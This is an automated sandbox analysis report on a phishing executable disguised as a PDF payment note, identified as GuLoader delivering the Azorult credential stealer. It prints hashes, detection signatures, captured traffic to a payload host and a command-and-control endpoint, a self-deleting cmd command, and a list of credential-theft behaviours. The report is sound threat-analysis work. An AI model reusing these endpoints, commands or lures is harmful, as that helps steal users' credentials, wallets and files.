Windows Analysis Report
Payment Advice Note_Pdf.exe

Overview

General Information

Sample name: Payment Advice Note_Pdf.exe
Analysis ID: 1522667
MD5: 6252d288d82fa00e65d3ba32bdc53411
SHA1: c9c0c3e7d495ad742c76260964810ed5f0b82cd1
SHA256: 9f2aca94590b9f367108ce3db9f0c67d35e884f1f254fb7f761e00f2c905bdcf

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Azorult
Yara detected GuLoader
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Azorult
Description: AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
Attribution: The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

Source: http://d4hk.shop/MI341/index.php Virustotal: Detection: 12%
Source: Payment Advice Note_Pdf.exe Virustotal: Detection: 13%
Source: Payment Advice Note_Pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.93.121.126:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: Payment Advice Note_Pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1427385273.00000000358A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00406362 FindFirstFileW,FindClose, 0_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00406362 FindFirstFileW,FindClose, 2_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_004027FB FindFirstFileW, 2_2_004027FB

Networking

Source: Network traffic Suricata IDS: 2029468 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M15 : 192.168.11.20:49754 -> 172.67.215.93:80
Source: Network traffic Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.11.20:49754 -> 172.67.215.93:80
Source: Network traffic Suricata IDS: 2029138 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M3 : 172.67.215.93:80 -> 192.168.11.20:49754
Source: Network traffic Suricata IDS: 2029468 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M15 : 192.168.11.20:49755 -> 172.67.215.93:80
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49753 -> 172.93.121.126:443
Source: global traffic HTTP traffic detected:
  GET /Hpgcc91.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: uktnl.vantechdns.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /MI341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: d4hk.shop
  Content-Length: 107
  Cache-Control: no-cache
  Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 3b 70 9d 3b 70 9d 37 13 8b 30 64 ed 42 10 8b 31 11 8b 30 65 8b 30 63 ec 26 66 9b 45 70 9d 35 70 9d 35 11
  Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp;p;p70dB10e0c&fEp5p5
Source: global traffic HTTP traffic detected:
  POST /MI341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: d4hk.shop
  Content-Length: 43514
  Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: global traffic DNS traffic detected: DNS query: uktnl.vantechdns.com
Source: global traffic DNS traffic detected: DNS query: d4hk.shop
Source: unknown HTTP traffic detected:
  POST /MI341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: d4hk.shop
  Content-Length: 107
  Cache-Control: no-cache
  Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 3b 70 9d 3b 70 9d 37 13 8b 30 64 ed 42 10 8b 31 11 8b 30 65 8b 30 63 ec 26 66 9b 45 70 9d 35 70 9d 35 11
  Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp;p;p70dB10e0c&fEp5p5
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://d4hk.shop/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://d4hk.shop/MI341/index.php
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://d4hk.shop/MI341/index.phpA
Source: Payment Advice Note_Pdf.exe, 00000000.00000000.884748585.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Payment Advice Note_Pdf.exe, 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1429245765.0000000036590000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005429000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354338715.0000000000068000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354292731.0000000000064000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.0000000005426000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.0000000005426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.000000000541B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.000000000541B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.0000000005426000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uktnl.vantechdns.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1417784434.0000000007030000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://uktnl.vantechdns.com/Hpgcc91.bin
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uktnl.vantechdns.com/d4
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_004052BD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052BD

System Summary

Source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: initial sample Static PE information: Filename: Payment Advice Note_Pdf.exe
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040326A
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040326A
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\toenailed\quoteworthy\Atoning\Skiftevis.sys
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Windows\resources\0409
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_004066E3 0_2_004066E3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00404AFA 0_2_00404AFA
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_004066E3 2_2_004066E3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00404AFA 2_2_00404AFA
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: String function: 00402BBF appears 51 times
Source: Payment Advice Note_Pdf.exe Static PE information: invalid certificate
Source: api-ms-win-crt-multibyte-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1427385273.00000000358A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Payment Advice Note_Pdf.exe
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Payment Advice Note_Pdf.exe
Source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/56@3/2
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_0040457E GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_0040457E
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00402095 CoCreateInstance, 0_2_00402095
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\toenailed
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-884F1CAE-06B5F66D
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_03
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsvE6B1.tmp
Source: Payment Advice Note_Pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.000000000542E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File read: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: iertutil.dll
